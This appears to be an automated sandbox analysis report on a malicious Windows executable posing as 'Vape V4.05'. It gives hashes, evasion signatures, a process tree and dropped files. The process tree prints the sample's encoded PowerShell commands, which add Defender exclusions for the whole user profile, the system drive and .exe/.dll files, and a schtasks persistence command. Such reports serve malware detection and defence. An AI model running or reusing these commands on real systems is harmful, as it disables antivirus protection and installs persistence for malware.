Analysis
-
max time kernel
145s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
17-02-2022 14:46
Static task
static1
Behavioral task
behavioral1
Sample
Vape V4.05.exe
Resource
win7-en-20211208
General
-
Target
Vape V4.05.exe
-
Size
13.9MB
-
MD5
b26285219a7d20505e4a8628fe4092f2
-
SHA1
9b0109eb2e0fd5a401820262fe9a8272600685b1
-
SHA256
829e4cdc3b9823f5967f4d84c0a5f0e654e95760d09eb5de9c9ad91544dc9478
-
SHA512
da09d8e018d77c5cd4d56afc03b4228fdf5a9dbca0294c41f2808a7f106ad118253b895db87f6f6461b11830401e07e304c92572a0678bdb390e5e9b67cbe7d3
Malware Config
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 1700 created 4912 1700 WerFault.exe Vape_V4.exe -
Processes:
resource yara_rule behavioral2/memory/4840-130-0x0000000000400000-0x00000000015DC000-memory.dmp evasion -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 4 IoCs
Processes:
syn conhost.exeVape_V4.exeservices32.exesihost64.exepid process 1944 syn conhost.exe 4912 Vape_V4.exe 3224 services32.exe 1784 sihost64.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Vape_V4.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Vape_V4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Vape_V4.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Vape_V4.exeservices32.exeVape V4.05.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Vape_V4.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation services32.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Vape V4.05.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe themida C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe themida -
Processes:
Vape_V4.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Vape_V4.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Vape V4.05.exeVape_V4.exepid process 4840 Vape V4.05.exe 4840 Vape V4.05.exe 4912 Vape_V4.exe -
Drops file in Windows directory 8 IoCs
Processes:
svchost.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2728 4912 WerFault.exe Vape_V4.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exeVape_V4.exeWerFault.exepowershell.exesyn conhost.exepowershell.exepowershell.exeservices32.exepid process 4780 powershell.exe 4912 Vape_V4.exe 4912 Vape_V4.exe 4912 Vape_V4.exe 4912 Vape_V4.exe 4780 powershell.exe 2728 WerFault.exe 2728 WerFault.exe 3776 powershell.exe 3776 powershell.exe 1944 syn conhost.exe 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 1908 powershell.exe 1908 powershell.exe 1908 powershell.exe 3224 services32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeVape_V4.exepowershell.exesyn conhost.exesvchost.exeTiWorker.exepowershell.exepowershell.exeservices32.exedescription pid process Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 4912 Vape_V4.exe Token: SeDebugPrivilege 3776 powershell.exe Token: SeDebugPrivilege 1944 syn conhost.exe Token: SeShutdownPrivilege 1496 svchost.exe Token: SeCreatePagefilePrivilege 1496 svchost.exe Token: SeShutdownPrivilege 1496 svchost.exe Token: SeCreatePagefilePrivilege 1496 svchost.exe Token: SeShutdownPrivilege 1496 svchost.exe Token: SeCreatePagefilePrivilege 1496 svchost.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 3224 services32.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe Token: SeBackupPrivilege 4500 TiWorker.exe Token: SeRestorePrivilege 4500 TiWorker.exe Token: SeSecurityPrivilege 4500 TiWorker.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Vape V4.05.exepid process 4840 Vape V4.05.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
Vape V4.05.exesyn conhost.execmd.exeWerFault.execmd.execmd.exeservices32.execmd.exedescription pid process target process PID 4840 wrote to memory of 1944 4840 Vape V4.05.exe syn conhost.exe PID 4840 wrote to memory of 1944 4840 Vape V4.05.exe syn conhost.exe PID 4840 wrote to memory of 4912 4840 Vape V4.05.exe Vape_V4.exe PID 4840 wrote to memory of 4912 4840 Vape V4.05.exe Vape_V4.exe PID 1944 wrote to memory of 2284 1944 syn conhost.exe cmd.exe PID 1944 wrote to memory of 2284 1944 syn conhost.exe cmd.exe PID 2284 wrote to memory of 4780 2284 cmd.exe powershell.exe PID 2284 wrote to memory of 4780 2284 cmd.exe powershell.exe PID 1700 wrote to memory of 4912 1700 WerFault.exe Vape_V4.exe PID 1700 wrote to memory of 4912 1700 WerFault.exe Vape_V4.exe PID 2284 wrote to memory of 3776 2284 cmd.exe powershell.exe PID 2284 wrote to memory of 3776 2284 cmd.exe powershell.exe PID 1944 wrote to memory of 5112 1944 syn conhost.exe cmd.exe PID 1944 wrote to memory of 5112 1944 syn conhost.exe cmd.exe PID 5112 wrote to memory of 3692 5112 cmd.exe schtasks.exe PID 5112 wrote to memory of 3692 5112 cmd.exe schtasks.exe PID 1944 wrote to memory of 2776 1944 syn conhost.exe cmd.exe PID 1944 wrote to memory of 2776 1944 syn conhost.exe cmd.exe PID 2776 wrote to memory of 3224 2776 cmd.exe services32.exe PID 2776 wrote to memory of 3224 2776 cmd.exe services32.exe PID 3224 wrote to memory of 2716 3224 services32.exe cmd.exe PID 3224 wrote to memory of 2716 3224 services32.exe cmd.exe PID 2716 wrote to memory of 2416 2716 cmd.exe powershell.exe PID 2716 wrote to memory of 2416 2716 cmd.exe powershell.exe PID 2716 wrote to memory of 1908 2716 cmd.exe powershell.exe PID 2716 wrote to memory of 1908 2716 cmd.exe powershell.exe PID 3224 wrote to memory of 1784 3224 services32.exe sihost64.exe PID 3224 wrote to memory of 1784 3224 services32.exe sihost64.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Vape V4.05.exe"C:\Users\Admin\AppData\Local\Temp\Vape V4.05.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\syn conhost.exe"C:\Users\Admin\AppData\Local\Temp\syn conhost.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exeC:\Users\Admin\AppData\Roaming\Microsoft\services32.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4912 -s 6803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 4912 -ip 49121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
e5663972c1caaba7088048911c758bf3
SHA13462dea0f9c2c16a9c3afdaef8bbb1f753c1c198
SHA2569f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e
SHA512ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
51cf8df21f531e31f7740b4ec487a48a
SHA140c6a73b22d71625a62df109aefc92a5f9b9d13e
SHA256263d9b98a897d1d66da4832af640c4bf5ab0ae91125ba12243453dfe714f3d0d
SHA51257a85461f6ea96b26a8b53d3a9cca18543e4ddbe996e8f412fc4cf7cf6e9ffe558c96da7b322a42f18bef62020e65aee119bed6102f75e2f605df09b02ec6368
-
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exeMD5
7407fd99ee1940051b4f543656ea9b0a
SHA17149b25db501b75111ac77fe4bcfe6915058757a
SHA256bef628b23396d36849beac1bf633859d02f82ae9dc877281862b7e9e85148ecd
SHA512804a257e128f54d5febaca7424f308403e092f773119075270b89d8721e9cc91e3b7adc402ad9a9fbb252b5af250745d2f6a34f523f30b1f08c212aea0e5b75d
-
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exeMD5
7407fd99ee1940051b4f543656ea9b0a
SHA17149b25db501b75111ac77fe4bcfe6915058757a
SHA256bef628b23396d36849beac1bf633859d02f82ae9dc877281862b7e9e85148ecd
SHA512804a257e128f54d5febaca7424f308403e092f773119075270b89d8721e9cc91e3b7adc402ad9a9fbb252b5af250745d2f6a34f523f30b1f08c212aea0e5b75d
-
C:\Users\Admin\AppData\Local\Temp\syn conhost.exeMD5
8d219ec4b3221c9e18f05d663b245a7b
SHA108f956878fa7144d425a7be049d172ce743424d4
SHA25615090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8
SHA512db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f
-
C:\Users\Admin\AppData\Local\Temp\syn conhost.exeMD5
8d219ec4b3221c9e18f05d663b245a7b
SHA108f956878fa7144d425a7be049d172ce743424d4
SHA25615090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8
SHA512db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exeMD5
e83a53213ee5593da07c3da2fa6e53c4
SHA1230cd2f92bfcb38a727209a0ed14272aec969a59
SHA2568bb79f322069a21f06ceb8916aef6dddeb7934c25ef35b8a38b918491d648c66
SHA512dd667fc2fcbe26547d16cc9a6ce18e55c57c62cee1bd365ebef17e88d0f0694bec69921179433b06fa89569d7b52f064b8ba0cc8b2fab3e13cb4b089b9b3e1dc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exeMD5
e83a53213ee5593da07c3da2fa6e53c4
SHA1230cd2f92bfcb38a727209a0ed14272aec969a59
SHA2568bb79f322069a21f06ceb8916aef6dddeb7934c25ef35b8a38b918491d648c66
SHA512dd667fc2fcbe26547d16cc9a6ce18e55c57c62cee1bd365ebef17e88d0f0694bec69921179433b06fa89569d7b52f064b8ba0cc8b2fab3e13cb4b089b9b3e1dc
-
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exeMD5
8d219ec4b3221c9e18f05d663b245a7b
SHA108f956878fa7144d425a7be049d172ce743424d4
SHA25615090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8
SHA512db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f
-
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exeMD5
8d219ec4b3221c9e18f05d663b245a7b
SHA108f956878fa7144d425a7be049d172ce743424d4
SHA25615090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8
SHA512db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f
-
memory/1496-152-0x000001EF61D70000-0x000001EF61D80000-memory.dmpFilesize
64KB
-
memory/1496-154-0x000001EF649F0000-0x000001EF649F4000-memory.dmpFilesize
16KB
-
memory/1496-153-0x000001EF62320000-0x000001EF62330000-memory.dmpFilesize
64KB
-
memory/1784-169-0x000000001DB80000-0x000000001DB82000-memory.dmpFilesize
8KB
-
memory/1784-167-0x0000000000A80000-0x0000000000A86000-memory.dmpFilesize
24KB
-
memory/1784-168-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmpFilesize
8KB
-
memory/1944-137-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmpFilesize
8KB
-
memory/1944-139-0x000000001DD30000-0x000000001DD32000-memory.dmpFilesize
8KB
-
memory/1944-134-0x0000000001450000-0x0000000001462000-memory.dmpFilesize
72KB
-
memory/1944-133-0x0000000000940000-0x0000000000B2E000-memory.dmpFilesize
1.9MB
-
memory/2416-161-0x000002343FAA0000-0x000002343FAA2000-memory.dmpFilesize
8KB
-
memory/2416-160-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmpFilesize
8KB
-
memory/2416-162-0x000002343FAA3000-0x000002343FAA5000-memory.dmpFilesize
8KB
-
memory/2416-163-0x000002343FAA6000-0x000002343FAA8000-memory.dmpFilesize
8KB
-
memory/3224-158-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmpFilesize
8KB
-
memory/3224-159-0x000000001E130000-0x000000001E132000-memory.dmpFilesize
8KB
-
memory/3776-150-0x000001CCE5126000-0x000001CCE5128000-memory.dmpFilesize
8KB
-
memory/3776-151-0x000001CCE5128000-0x000001CCE5129000-memory.dmpFilesize
4KB
-
memory/3776-148-0x000001CCE5120000-0x000001CCE5122000-memory.dmpFilesize
8KB
-
memory/3776-149-0x000001CCE5123000-0x000001CCE5125000-memory.dmpFilesize
8KB
-
memory/3776-147-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmpFilesize
8KB
-
memory/4780-144-0x000001FB4C876000-0x000001FB4C878000-memory.dmpFilesize
8KB
-
memory/4780-143-0x000001FB4C873000-0x000001FB4C875000-memory.dmpFilesize
8KB
-
memory/4780-142-0x000001FB4C870000-0x000001FB4C872000-memory.dmpFilesize
8KB
-
memory/4780-141-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmpFilesize
8KB
-
memory/4780-138-0x000001FB4C7E0000-0x000001FB4C802000-memory.dmpFilesize
136KB
-
memory/4840-130-0x0000000000400000-0x00000000015DC000-memory.dmpFilesize
17.9MB
-
memory/4912-140-0x00007FFC20410000-0x00007FFC20412000-memory.dmpFilesize
8KB